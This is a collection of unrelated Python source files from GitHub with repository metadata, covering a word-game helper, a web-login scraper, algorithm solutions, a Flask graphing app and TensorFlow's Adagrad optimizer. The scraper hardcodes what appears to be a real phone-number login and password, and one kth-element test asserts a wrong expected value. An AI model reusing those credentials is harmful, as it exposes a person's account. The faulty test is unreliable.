Regression/Perceptron.py","file_name":"Perceptron.py","file_ext":"py","file_size_in_byte":3178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27533769867","text":"import re\nimport os.path\nfrom api.models import errors\nfrom api.helpers import helper\n\nocd = open(os.path.dirname(__file__) + '/../dictionaries/original_codenames_dictionary.txt', 'r', encoding='utf-8')\ncodenames_words = list(map(helper.remove_new_line_symbol, ocd.readlines()))\n\nrnd = open(os.path.dirname(__file__) + 
'/../dictionaries/russian_nouns_dictionary.txt', 'r', encoding='utf-8')\nrussian_words = list(map(helper.remove_new_line_symbol, rnd.readlines()))\n\n\ndef is_word_in_codenames_dictionary(target_word):\n return helper.has_item_in_sorted_list(codenames_words, target_word)\n\n\ndef is_word_in_russian_dictionary(target_word):\n return helper.has_item_in_sorted_list(russian_words, target_word)\n\n\ndef run():\n reg_exp = '[а-я` -]+'\n max_word_length = 15\n\n print('Мы начинаем! Введите слова, которые Вы бы хотели добавить в новый словарь для игры Codenames. Чтобы '\n 'закончить добавление слов, введите 0.')\n\n while True:\n try:\n test_str = input(\"Введите новое слово: \").lower().replace('ё', 'е')\n if test_str == \"0\":\n print(\"Bye!\")\n break\n elif re.fullmatch(reg_exp, test_str) is None:\n raise errors.ValueDoesNotMatchRegExpError\n elif len(test_str) > max_word_length:\n raise errors.ValueTooLong\n elif is_word_in_codenames_dictionary(test_str):\n raise errors.ValueIsInCodenamesDictionary\n elif not is_word_in_russian_dictionary(test_str):\n answer_to_add = input('Данного слова нет в словаре русских слов (существительных). Вы уверены, '\n 'что хотите добавить это слово? Введите \"да\", если согласны: ')\n if answer_to_add == \"да\":\n print('Ok, we are adding this:', test_str)\n else:\n print('Ok, we will not add this')\n else:\n print('Ok, we are adding this:', test_str)\n\n except errors.ValueDoesNotMatchRegExpError:\n print('Допустимые символы - буквы русского алфавита, дефис, пробел и апостроф. Пожалуйста, '\n 'используйте только их.')\n except errors.ValueTooLong:\n print('Длина слова не должна превышать', max_word_length, 'символов.')\n except errors.ValueIsInCodenamesDictionary:\n print('Данное слово уже есть в списке слов Codenames.')\n\n\nrun()\n","repo_name":"ktttnv/codenames-words","sub_path":"api/scripts/add_new_codenames_words.py","file_name":"add_new_codenames_words.py","file_ext":"py","file_size_in_byte":2822,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71911977012","text":"import requests, lxml.html\nfrom bs4 import BeautifulSoup\nimport time\n\nurl = \"https://login.xiami.com/member/login??spm=0.0.0.0.ApbFK8\"\nurl2 = \"http://www.xiami.com/artist/top/id/23282\"\n\nheaders = {\"Accept\":\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\",\n \"User-Agent\": \"Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Mobile Safari/537.36\"}\n\nparams = {\"account\": \"18011370873\", \"pw\": \"Test_123\"}\n\nsession = requests.Session()\n\n#req2 = session.get(url, headers=headers)\n#cookie = req2.cookies\n#print(req2.cookies.get_dict())\n#time.sleep(5)\n\n\nreq2 = session.get(url, headers=headers)\ntime.sleep(3)\nlogin_html = lxml.html.fromstring(req2.text)\n#print(login_html)\nhidden_inputs = login_html.xpath(r'//form//input[@type=\"hidden\"]')\nform = {x.attrib[\"name\"]: x.attrib[\"value\"] for x in hidden_inputs}\n\n\nform['account'] = \"18011370873\"\nform['pw']= \"Test_123\"\n\nprint(form)\n\nres = session.post(url, data=form)\ntime.sleep(5)\n\nprint(res.status_code)\n\n\n#soup = BeautifulSoup(req.text, 
\"lxml\")\n#print(soup.find(\"p\"))\n\nprint(res.url)\nprint(res.cookies.get_dict())\n","repo_name":"xieqing181/Datascraping","sub_path":"trying_xiami.py","file_name":"trying_xiami.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16553232732","text":"import math\n\ndef eval_ciclo():\n while True:\n dato = input('> ')\n if dato == 'fatto':\n break\n dato_number = int(dato)\n print(dato_number)\n ciclo_ev = eval('math.sqrt(dato_number)')\n \n print(ciclo_ev)\n print(ciclo_ev)\n \neval_ciclo()\n","repo_name":"emilianot04/Exercise_Python","sub_path":"Think-Python/capitolo_8/esercizio-extra-8.1.py","file_name":"esercizio-extra-8.1.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22328194846","text":"#https://www.hackerearth.com/practice/algorithms/graphs/topological-sort/practice-problems/algorithm/lonelyisland-49054110/\n\nimport sys\nimport math\nfrom collections import defaultdict\n\ntry: \n sys.stdin = open('input.txt', 'r') \n sys.stdout = open('output.txt', 'w')\n \nexcept: \n pass\n\nsys.setrecursionlimit(100000)\n\nclass Graph():\n def __init__(self,source):\n self.neighbours=defaultdict(list)\n self.finished=[]\n self.indegree=defaultdict(lambda:0)\n self.outdegree=defaultdict(lambda:0)\n self.probabilty=defaultdict(lambda:0)\n self.probabilty[source]=1\n\n def addEdge(self,u,v):\n self.neighbours[u].append(v)\n self.outdegree[u]+=1\n self.indegree[v]+=1\n\n def DFSVisit(self,u,visited):\n visited[u]=True\n for v in self.neighbours[u]:\n if(not visited[v]):\n self.DFSVisit(v,visited)\n self.finished.append(u)\n\n\n \n def printLonelyIsland(self):\n visited=defaultdict(lambda:False)\n finishedStack=self.finished[:]\n while finishedStack:\n u=finishedStack.pop()\n for v in self.neighbours[u]:\n self.probabilty[v]+=self.probabilty[u]*(1/self.outdegree[u])\n\n \n \n\n\nn,m,source=[int(x) for x in input().split()]\ng1=Graph(source)\nfor i in range(m):\n u,v=[int(x) for x in input().split()]\n g1.addEdge(u,v)\n \ng1.DFSVisit(source,defaultdict(lambda:False))\ng1.printLonelyIsland()\nprobabilty=g1.probabilty\nfinishedStack=g1.finished\nislands=set()\nmaxProbability=0\nfor u in finishedStack:\n if(g1.outdegree[u]==0):\n maxProbability=max(probabilty[u],maxProbability)\n islands.add(u)\n\nepsilon=10**(-9)\nfinal_answer=[]\nfor node in islands:\n diff=abs(maxProbability-probabilty[node])\n if(diff<=epsilon):\n final_answer.append(node)\n\nfinal_answer=sorted(final_answer)\nprint(*final_answer)\n\n\n","repo_name":"thecodearrow/Algorithms","sub_path":"Data Stuctures/Graphs/Lonely Island.py","file_name":"Lonely Island.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"27228866435","text":"# tests/conftest.py\n# Note: This 'conftest.py' config module is autodiscoverable by Python\n\"\"\"Package-wide text fixtures.\"\"\"\nfrom unittest.mock import Mock\n\n\nfrom _pytest.config import Config\nimport pytest\nfrom pytest_mock import MockFixture\n\n\ndef pytest_configure(config: Config) -> None:\n \"\"\"Pytest configuration hook.\"\"\"\n config.addinivalue_line(\"markers\", \"e2e: mark as end-to-end test.\")\n\n\n@pytest.fixture\ndef mock_requests_get(mocker: MockFixture) -> Mock:\n \"\"\"Fixture for mocking requests get.\"\"\"\n mock = mocker.patch(\"requests.get\")\n 
mock.return_value.__enter__.return_value.json.return_value = {\n \"title\": \"Wicked Wicki\",\n \"extract\": \"The Wicked Wicki whacked the whacky tricky API\",\n }\n return mock\n","repo_name":"aibistin/my-python-setup","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29111672662","text":"from node.noderegistry import NodeRegistry\nimport asyncio\n\ndef main():\n # 创建节点注册表对象\n registry = NodeRegistry(zk_hosts=\"49.52.27.50:2181\", node_path=\"/nodes\")\n\n # 启动节点注册表\n registry.start()\n\n # 注册节点\n registry.register_node(\"node1\", b\"node1_data\")\n registry.register_node(\"node2\", b\"node2_data\")\n\n # 发现节点\n nodes = registry.discover_nodes()\n print(\"Discovered nodes:\", nodes)\n\n # 注销节点\n registry.unregister_node(\"node1\")\n registry.unregister_node(\"node2\")\n\n # 停止节点注册表\n registry.stop()\n\nmain()","repo_name":"WuDi329/TranscodingQoS","sub_path":"testregistry.py","file_name":"testregistry.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"46581710974","text":"def tempo(segundos):\n h = segundos // 3600\n m = (segundos % 3600) // 60\n s = (segundos % 3600) % 60\n return h, m, s\n\ndef main():\n valor_segundos = int(input(\"Digite a quantidade de segundos que o evento durou: \"))\n h, m, s = tempo(valor_segundos)\n print(f'o evento durou {h}H:{m}M:{s}S.')\nif __name__ == '__main__':\n main()\n","repo_name":"SirLeonardoFerreira/Atividades-ifpi","sub_path":"Atividade 01 - semana 02/questão3_semana2.py","file_name":"questão3_semana2.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42425009901","text":"from flask import Flask, render_template, request, send_file, redirect, make_response, jsonify, send_from_directory\nfrom flask_dropzone import Dropzone\nfrom src import DASGIP_loader, conf, handler, simple_json_db\n \nDB = simple_json_db.SimpleJSONDB()\n \nPAGE_TITLE = \"Eppendorf DASGIP Graph Builder\"\n_DRAG_DROP_TEXT_ = \"(or) Drag and Drop files here.\"\n_VALID_TYPES_ = ['jpeg', 'png', 'jpg', 'gif']\n_VAR_COLS_ = 3\n\napp = Flask(__name__)\ndropzone = Dropzone(app)\n\ndef get_handler(filename: str):\n return handler.Handler(DB.get_content(filename), filename=filename)\n\n@app.route(\"/\")\ndef index():\n '''\n Main page - displays the drag and drop text for file.\n '''\n\n if len(DB.get_files()) == 0:\n # If no files are available, redirect to upload page.\n return redirect(\"/upload\", 302)\n else:\n # Load any file to get variables and sources.\n # kept it like this for easy changing when different file contents.\n files = DB.get_files()\n local_handler = get_handler(files[0])\n sources = local_handler.sources\n vars = local_handler.get_variables(sources[0])\n \n # Organize the variables as lines with at most _VAR_COLS_ variables per line.\n lines = [[vars[j*_VAR_COLS_ + i] for i in range(min(len(vars),_VAR_COLS_))\n if j*_VAR_COLS_ + i < len(vars)]\n for j in range(len(vars)//_VAR_COLS_ +1)]\n \n # Clear config from nulls\n config = DB.config.copy()\n for key in ('min_map', 'max_map'):\n config[key] = {k:v for k,v in config.get(key, {'': None}).items()\n if v is not None}\n\n # Create main page\n response = make_response(render_template(\"./main_page.html\",\n **vars_main,\n files=files,\n **config,\n 
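# config was pruned of null min/max entries above before being splatted in\n                                              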
sources=sources,\n lines=lines)) \n return response\n \n@app.get(\"/\"+conf.API_CONFIG)\ndef show_config():\n # Check persistant configuration.\n return jsonify(DB.config)\n\n@app.route(\"/\"+conf.API_CONFIG, methods=[\"POST\", \"OPTIONS\"])\ndef set_config():\n if request.method == \"OPTIONS\":\n response = options_response()\n else:\n data = request.json\n # Create the configuration parameters\n cols = []\n min_map = {}\n max_map = {}\n color_map = {}\n for key in data:\n color, min_val, max_val = data[key]\n color_map.update({key: color})\n min_map.update({key: None} if min_val == '' else {key: int(min_val)})\n max_map.update({key: None} if max_val == '' else {key: int(max_val)})\n cols.append(key)\n \n options = {\n \"color_map\":color_map,\n \"min_map\":min_map,\n \"max_map\":max_map,\n \"cols\": cols\n }\n # Update persistant configuration\n DB.config = options\n DB.commit()\n response = make_response(\"ok\")\n response.headers.add('Access-Control-Allow-Origin', \"*\")\n return response\n\n@app.get(\"/\"+conf.API_UPLOAD)\ndef upload_get():\n '''\n Uploads the file content and redirects to the selection page.\n '''\n\n return render_template(\"./upload.html\", **vars_upload)\n\n@app.post(\"/\"+conf.API_UPLOAD)\ndef upload():\n '''\n Uploads the file content and redirects to the selection page.\n '''\n\n for file in request.files.getlist('file'):\n filename = ''.join( (c for c in file.filename.split('\\\\')[-1] \\\n if c.isalnum() or c in ' -_.'))\n # Decode content, remove \\r if inserted and break into blocks per vessel\n data_blocks = DASGIP_loader.data_block_loader(\n content=file.read().decode(\"utf-8\").replace(\"\\r\",''))\n # Update database with data blocks for each file\n DB.update_content(filename, data_blocks)\n \n DB.commit()\n return redirect(\"/\", 302)\n\n@app.route(\"/\"+conf.API_GRAPH, methods=[\"POST\", \"OPTIONS\"])\ndef graph_maker():\n if request.method == \"OPTIONS\":\n response = options_response()\n else:\n options = DB.config.copy()\n cols = options.pop(\"cols\")\n data = request.json\n if data[\"files\"] == [] or data[\"sources\"] == []:\n response = jsonify({\"paths\":[\"test.png\"]})\n else:\n files_created = []\n\n for file in data[\"files\"]:\n local_handler = get_handler(file)\n local_handler.add_option(data=options)\n for source in data[\"sources\"]:\n files_created.append(\n local_handler.make_graph(source,local_handler.filter_cols(source, cols))\n )\n response = jsonify({\"paths\":files_created})\n response.headers.add('Access-Control-Allow-Origin', \"*\")\n return response\n\n@app.route(\"/\"+conf.API_LIST_FILES)\ndef list_files():\n return ';\\n'.join(DB.get_files())\n\n@app.get(\"/\"+conf.API_IMGS)\ndef list_imgs():\n return DB.get_imgs\n\n@app.route(\"/\"+conf.API_IMGS+\"\")\ndef get_img(filename: str):\n filename = filename.split(\"/\")[-1]\n if filename.split('.')[-1] not in _VALID_TYPES_:\n return conf._ERROR_IMG_\n return send_from_directory(\"../\", conf.__IMG_DIR__+filename, mimetype='image/png')\n\nwith app.app_context():\n _UPLOAD_PATH_ = conf.API_URL+conf.API_UPLOAD\n\n vars_upload = {\n \"PAGE_TITLE\": PAGE_TITLE,\n \"_DRAG_DROP_TEXT_\": _DRAG_DROP_TEXT_,\n \"_UPLOAD_PATH_\": _UPLOAD_PATH_\n }\n\n vars_main = {\n \"PAGE_TITLE\": PAGE_TITLE,\n \"_CONFIG_PATH_\": conf.API_URL+conf.API_CONFIG,\n \"_UPLOAD_PATH_\": _UPLOAD_PATH_,\n \"_IMAGES_PATH_\": conf.API_URL+conf.API_IMGS,\n \"_GRAPH_PATH_\": conf.API_URL+conf.API_GRAPH\n }\n\n\ndef options_response():\n response = make_response()\n response.headers.add(\"Access-Control-Allow-Origin\", 
\"*\")\n response.headers.add(\"Access-Control-Allow-Headers\", \"*\")\n response.headers.add(\"Access-Control-Allow-Methods\", \"*\")\n return response\n\nif __name__ == \"__main__\":\n app.run(debug=False, port=conf.API_PORT)\n","repo_name":"MarFerDom/DASGIPGraphBuilder","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18403377159","text":"import math\nimport unittest\n# https://yao.page/posts/kth-smallest-element-in-two-sorted-arrays-python/\n# https://www.youtube.com/watch?v=LPFhl65R7ww&t=597s\nclass Solution:\n def kthElement(self,A, B,n,m, k):\n\n lo=0\n hi = len(A) # it's \"len(A)\" and not \"len(A)-1\". the maximum number that can be chosen from the first array\n\n # more efficient\n # If *all* elements in B are in B's left ptn,\n # we'll need at least k - len(B) elements\n # in A's left ptn\n # lo = max(0, k - len(B))\n\n # If k is less than the size of A, then we\n # only need at most k elements in A's left ptn\n # hi = min(len(A), k)\n\n def get_val(arr, i): # more detail: check out the link -> https://yao.page/posts/kth-smallest-element-in-two-sorted-arrays-python/\n if 0 <= i <= len(arr) - 1:\n return arr[i]\n return math.inf * (-1 if i < 0 else 1)\n\n while lo <= hi:\n A_size = (lo + hi) // 2 # A_size indicates left size of A\n B_size = k - A_size\n\n A_left, A_right = get_val(A, A_size-1), get_val(A, A_size)\n B_left, B_right = get_val(B, B_size-1), get_val(B, B_size)\n\n if A_left <= B_right and B_left <= A_right:\n return max(A_left, B_left)\n\n elif A_left > B_right:\n hi =A_size - 1\n\n else: # B_left > A_right\n lo = A_size + 1\n\n\n\n\nclass MyTestCase(unittest.TestCase):\n def test_1(self):\n x = [1,3,5,7,9,11]\n y = [2,4,6,8,10]\n k = 6\n actual = Solution().kthElement(x,y,len(x),len(y), k)\n expected = 6\n self.assertEqual(expected, actual)\n\n\n\n\n\n\n\n\n##############################################################################\n# I've implemented kth Largest element. Geeksforgeeks question wants the kth smallest\n\n\nclass Solution:\n def kthElement(self, nums1, nums2,n,m, k):\n if len(nums1)>len(nums2):return self.kthElement(nums2, nums1,n,m, k)\n n1,n2= len(nums1), len(nums2)\n low,high=0,n1\n while low<=high:\n tmp = n1 + n2 - k\n partition_x = (low+high)//2\n partition_y = tmp - partition_x\n maxLeft_x = nums1[partition_x-1] if partition_x!=0 else float('-inf')\n minRight_x = nums1[partition_x] if partition_x!=n1 else float('inf')\n\n maxLeft_y = nums2[partition_y-1] if partition_y!=0 else float('-inf')\n minRight_y = nums2[partition_y] if partition_y!=n2 else float('inf')\n\n if maxLeft_x <= minRight_y and maxLeft_y<=minRight_x:\n return min(minRight_y, minRight_x)\n elif maxLeft_x>minRight_y:\n high = partition_x-1\n else:\n low=partition_x+1\n\n# sol = Solution()\n# x = [0,1,2,5,9]\n# y = [-2,-1,3,4,6,8]\n# k = 4\n# print(sol.kthElement(x, y,len(x),len(y), k), 5)\n# x = [1,10,10,25,40,54,79]\n# y = [15, 24, 27, 32, 33, 39, 48, 68, 82, 88, 90]\n# k = 15\n# print(sol.kthElement(x, y,len(x),len(y), k), 15)\n\n\n\n\n\n\n\n\n\n# https://yao.page/posts/kth-smallest-element-in-two-sorted-arrays-python/\ndef find_kth_smallest(A, B, k):\n\n lo=0\n hi = len(A) # it's \"len(A)\" and not \"len(A)-1\". 
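# --- Editor's note (not part of the scraped record): the partition search in
# kthElement above keeps k elements total across the two left halves, so the
# answer is max(A_left, B_left). A hedged brute-force cross-check
# (kth_smallest_bruteforce is a hypothetical helper; k is 1-based, as in the
# record's tests):
def kth_smallest_bruteforce(a, b, k):
    return sorted(a + b)[k - 1]

assert kth_smallest_bruteforce([1, 3, 5, 7, 9, 11], [2, 4, 6, 8, 10], 6) == 6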
the maximum number that can be chosen from the first array\n\n # more efficient\n # If *all* elements in B are in B's left ptn,\n # we'll need at least k - len(B) elements\n # in A's left ptn\n # lo = max(0, k - len(B))\n\n # If k is less than the size of A, then we\n # only need at most k elements in A's left ptn\n # hi = min(len(A), k)\n\n def get_val(arr, i): # more detail: check out the link -> https://yao.page/posts/kth-smallest-element-in-two-sorted-arrays-python/\n if 0 <= i <= len(arr) - 1:\n return arr[i]\n return math.inf * (-1 if i < 0 else 1)\n\n while lo <= hi:\n A_size = (lo + hi) // 2 # A_size indicates left size of A\n B_size = k - A_size\n\n A_left, A_right = get_val(A, A_size-1), get_val(A, A_size)\n B_left, B_right = get_val(B, B_size-1), get_val(B, B_size)\n\n if A_left <= B_right and B_left <= A_right:\n return max(A_left, B_left)\n\n elif A_left > B_right:\n hi =A_size - 1\n\n else: # B_left > A_right\n lo = A_size + 1\n\n\n\n\nclass MyTestCase2(unittest.TestCase):\n def test_3(self):\n x = [1,3,5,7,9,11]\n y = [2,4,6,8,10]\n k = 6\n actual = find_kth_smallest(x,y, k)\n expected = 5\n self.assertEqual(expected, actual)\n\n\n\n\n\n\n# Base cases:\n#\n# If length of one of the arrays is 0, the answer is kth element of the second array.\n# Reduction steps:\n#\n# If mid index of a + mid index of b is less than k:\n# If mid element of a is greater than mid element of b, we can ignore the first half of b, adjust k.\n# Otherwise, ignore the first half of a, adjust k.\n# If k is less than sum of mid indices of a and b:\n# If mid element of a is greater than mid element of b, we can safely ignore second half of a.\n# Otherwise, we can ignore second half of b.\ndef kthlargest(a, b, k):\n if len(a) == 0:\n return b[k]\n elif len(b) == 0:\n return a[k]\n\n mid1 = len(a) // 2 # integer division\n mid2 = len(b) // 2\n if mid1 + mid2 < k:\n if a[mid1] > b[mid2]:\n return kthlargest(a, b[mid2 + 1:], k - mid2 - 1)\n else:\n return kthlargest(a[mid1 + 1:], b, k - mid1 - 1)\n else:\n if a[mid1] > b[mid2]:\n return kthlargest(a[:mid1], b, k)\n else:\n return kthlargest(a, b[:mid2], k)\n\n\n# class MyTestCase(unittest.TestCase):\n# def test_2(self):\n# x = [5]\n# y = [2,4,6,8,10]\n# k = 1\n# actual = kthlargest(x,y, k)\n# expected = 4\n# self.assertEqual(expected, actual)\n# def test_3(self):\n# x = [1,3,5,7,9,11]\n# y = [2,4,6,8,10]\n# k = 4\n# actual = kthlargest(x,y, k)\n# expected = 5\n# self.assertEqual(expected, actual)\n","repo_name":"afzalsiddique/problem-solving","sub_path":"Problem_Solving_Python/gfg/kth_largest_element_in_two_sorted_arrays.py","file_name":"kth_largest_element_in_two_sorted_arrays.py","file_ext":"py","file_size_in_byte":5978,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"37533807026","text":"\ndef Merge(list2, list, left, middle, right):\n #list为合并后的目标数组,将有序的序列 list2[s..m] 和 list2[m+1..t]归并为有序的序列 list[s..t]\n i = left\n j = middle + 1\n k = left\n while (i <= middle) and (j <= right):\n if list2[i] <= list2[j]:\n list[k] = list2[i]\n i = i + 1\n else:\n list[k] = list2[j]\n j = j + 1\n k = k + 1\n if i <= middle:\n while i <= middle:\n list[k] = list2[i]\n k = k + 1\n i = i + 1\n if j <= right:\n while j <= right:\n list[k] = list2[j]\n k = k + 1\n j = j + 1\n\ndef Msort(list2, list, start, end):\n #将 list2[s..t] 通过 list3[] 归并排序为 list[s..t]\n list3 = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]\n if start == end:\n list[start] = list2[start]\n else:\n middle = int((start + end) / 2)\n 
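# --- Editor's note (not part of the scraped record): Msort above reuses a
# hard-coded 10-slot scratch list (list3), so it only works for inputs no
# longer than the demo array in main(). A hedged, general sketch of the same
# top-down merge sort without the fixed buffer or the index-0 sentinel:
def merge_sort(seq):
    if len(seq) <= 1:
        return list(seq)
    mid = len(seq) // 2
    left, right = merge_sort(seq[:mid]), merge_sort(seq[mid:])
    out, i, j = [], 0, 0
    while i < len(left) and j < len(right):
        if left[i] <= right[j]:
            out.append(left[i])
            i += 1
        else:
            out.append(right[j])
            j += 1
    return out + left[i:] + right[j:]   # append the leftover tail

assert merge_sort([6.0, 2.2, 7.2, 4.0]) == [2.2, 4.0, 6.0, 7.2]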
Msort(list2, list3, start, middle)\n Msort(list2, list3, middle+1, end)\n Merge(list3, list, start, middle, end)\n\ndef MergeSort(list): #默认第0项为哨兵项\n size = len(list) - 1\n Msort(list, list, 1, size)\n\ndef main():\n list = [ 0.0, 6.0, 2.2, 7.2, 4.0, 9.0, 0.8, 5.0, 6.0, 2.0 ]\n print(list[1::])\n MergeSort(list)\n print(list[1::])\n\nif __name__ == '__main__':\n print(__name__)\n main()\n","repo_name":"ToLoveToFeel/Sort_Python","sub_path":"4.MergeSort/MergeSort/MergeSort.py","file_name":"MergeSort.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37988653748","text":"from assasin import Assasin\nfrom samurai import Samurai\nfrom ninja import Ninja\nfrom vampyre import Vampyre\nfrom colorama import Fore\n\nprint('Красные юниты - Красныя команда')\nprint('Синие юниты - Синяя команда')\n\nplayer1 = Assasin(name='Эцио', health=700, damage=30, defence=0,\n color=Fore.LIGHTRED_EX)\nprint(player1)\n\nplayer2 = Samurai(name='武士', health=1000, damage=10, defence=0,\n color=Fore.LIGHTBLUE_EX)\nprint(player2)\n\nplayer3 = Ninja(name='Ninjaon', health=900, damage=50, defence=0,\n color=Fore.LIGHTMAGENTA_EX)\nprint(player3)\n\nplayer4 = Vampyre(name='Drakula', health=1000, damage=30, defence=0,\n color=Fore.LIGHTCYAN_EX)\nprint(player4)\n\nwhile player1.is_alive() and player2.is_alive():\n player1.attack(player2)\n player2.attack(player1)\n\n\n print(player1)\n print(player2)\n\n\nwhile player3.is_alive() and player4.is_alive():\n player3.attack(player4)\n player4.attack(player3)\n print(player3)\n print(player4)","repo_name":"SmokeEtern1tygamingSCPRP/student","sub_path":"Lesson_3/maining.py","file_name":"maining.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"15937333021","text":"\nimport numpy as np\nfrom tensorflow.python.framework import dtypes\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.keras import backend_config\nfrom tensorflow.python.keras.optimizer_v2 import optimizer_v2\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.ops import init_ops\nfrom tensorflow.python.training import gen_training_ops\nfrom tensorflow.python.util.tf_export import keras_export\n@keras_export('keras.optimizers.Adagrad')\nclass Adagrad(optimizer_v2.OptimizerV2):\n r\"\"\"Optimizer that implements the Adagrad algorithm.\n Adagrad is an optimizer with parameter-specific learning rates,\n which are adapted relative to how frequently a parameter gets\n updated during training. The more updates a parameter receives,\n the smaller the updates.\n Args:\n learning_rate: Initial value for the learning rate:\n either a floating point value,\n or a `tf.keras.optimizers.schedules.LearningRateSchedule` instance.\n Defaults to 0.001.\n Note that `Adagrad` tends to benefit from higher initial learning rate\n values compared to other optimizers.\n To match the exact form in the original paper, use 1.0.\n initial_accumulator_value: Floating point value.\n Starting value for the accumulators (per-parameter momentum values).\n Must be non-negative.\n epsilon: Small floating point value used to maintain numerical stability.\n name: Optional name prefix for the operations created when applying\n gradients. Defaults to `\"Adagrad\"`.\n **kwargs: Keyword arguments. 
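# --- Editor's note (not part of the scraped file): the parameter-specific
# rule this docstring describes, sketched in plain NumPy under the usual
# AdagradV2 formulation (accumulator seeded with initial_accumulator_value;
# epsilon added outside the square root) -- an illustrative sketch, not the
# TensorFlow implementation itself:
import numpy as np

def adagrad_step(theta, grad, accum, lr=0.001, epsilon=1e-7):
    accum = accum + grad ** 2                          # per-parameter history
    theta = theta - lr * grad / (np.sqrt(accum) + epsilon)
    return theta, accum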
Allowed to be one of\n `\"clipnorm\"` or `\"clipvalue\"`.\n `\"clipnorm\"` (float) clips gradients by norm and represents\n the maximum L2 norm of each weight variable;\n `\"clipvalue\"` (float) clips gradient by value and represents the\n maximum absolute value of each weight variable.\n Reference:\n - [Duchi et al., 2011](\n http://www.jmlr.org/papers/volume12/duchi11a/duchi11a.pdf).\n \"\"\"\n _HAS_AGGREGATE_GRAD = True\n def __init__(self,\n learning_rate=0.001,\n initial_accumulator_value=0.1,\n epsilon=1e-7,\n name='Adagrad',\n **kwargs):\n if initial_accumulator_value < 0.0:\n raise ValueError('initial_accumulator_value must be non-negative: %s' %\n initial_accumulator_value)\n if epsilon is None:\n epsilon = backend_config.epsilon()\n super(Adagrad, self).__init__(name, **kwargs)\n self._set_hyper('learning_rate', kwargs.get('lr', learning_rate))\n self._set_hyper('decay', self._initial_decay)\n self._initial_accumulator_value = initial_accumulator_value\n self.epsilon = epsilon or backend_config.epsilon()\n def _create_slots(self, var_list):\n for var in var_list:\n dtype = var.dtype.base_dtype\n init = init_ops.constant_initializer(\n self._initial_accumulator_value, dtype=dtype)\n self.add_slot(var, 'accumulator', init)\n def _prepare_local(self, var_device, var_dtype, apply_state):\n super(Adagrad, self)._prepare_local(var_device, var_dtype, apply_state)\n apply_state[(var_device, var_dtype)].update(\n dict(\n epsilon=ops.convert_to_tensor_v2_with_dispatch(\n self.epsilon, var_dtype),\n neg_lr_t=-apply_state[(var_device, var_dtype)]['lr_t'],\n zero=array_ops.zeros((), dtype=dtypes.int64)))\n def set_weights(self, weights):\n params = self.weights\n if len(params) == len(weights) + 1:\n weights = [np.array(0)] + weights\n super(Adagrad, self).set_weights(weights)\n @classmethod\n def from_config(cls, config, custom_objects=None):\n if 'initial_accumulator_value' not in config:\n config['initial_accumulator_value'] = 0.1\n if 'lr' in config:\n config['learning_rate'] = config.pop('lr')\n return cls(**config)\n def _resource_apply_dense(self, grad, var, apply_state=None):\n var_device, var_dtype = var.device, var.dtype.base_dtype\n coefficients = ((apply_state or {}).get((var_device, var_dtype))\n or self._fallback_apply_state(var_device, var_dtype))\n acc = self.get_slot(var, 'accumulator')\n return gen_training_ops.ResourceApplyAdagradV2(\n var=var.handle,\n accum=acc.handle,\n lr=coefficients['lr_t'],\n epsilon=coefficients['epsilon'],\n grad=grad,\n use_locking=self._use_locking)\n def _resource_apply_sparse(self, grad, var, indices, apply_state=None):\n var_device, var_dtype = var.device, var.dtype.base_dtype\n coefficients = ((apply_state or {}).get((var_device, var_dtype))\n or self._fallback_apply_state(var_device, var_dtype))\n acc = self.get_slot(var, 'accumulator')\n return gen_training_ops.ResourceSparseApplyAdagradV2(\n var=var.handle,\n accum=acc.handle,\n lr=coefficients['lr_t'],\n epsilon=coefficients['epsilon'],\n grad=grad,\n indices=indices,\n use_locking=self._use_locking)\n def get_config(self):\n config = super(Adagrad, self).get_config()\n config.update({\n 'learning_rate': self._serialize_hyperparameter('learning_rate'),\n 'decay': self._initial_decay,\n 'initial_accumulator_value': self._initial_accumulator_value,\n 'epsilon': self.epsilon,\n })\n return 
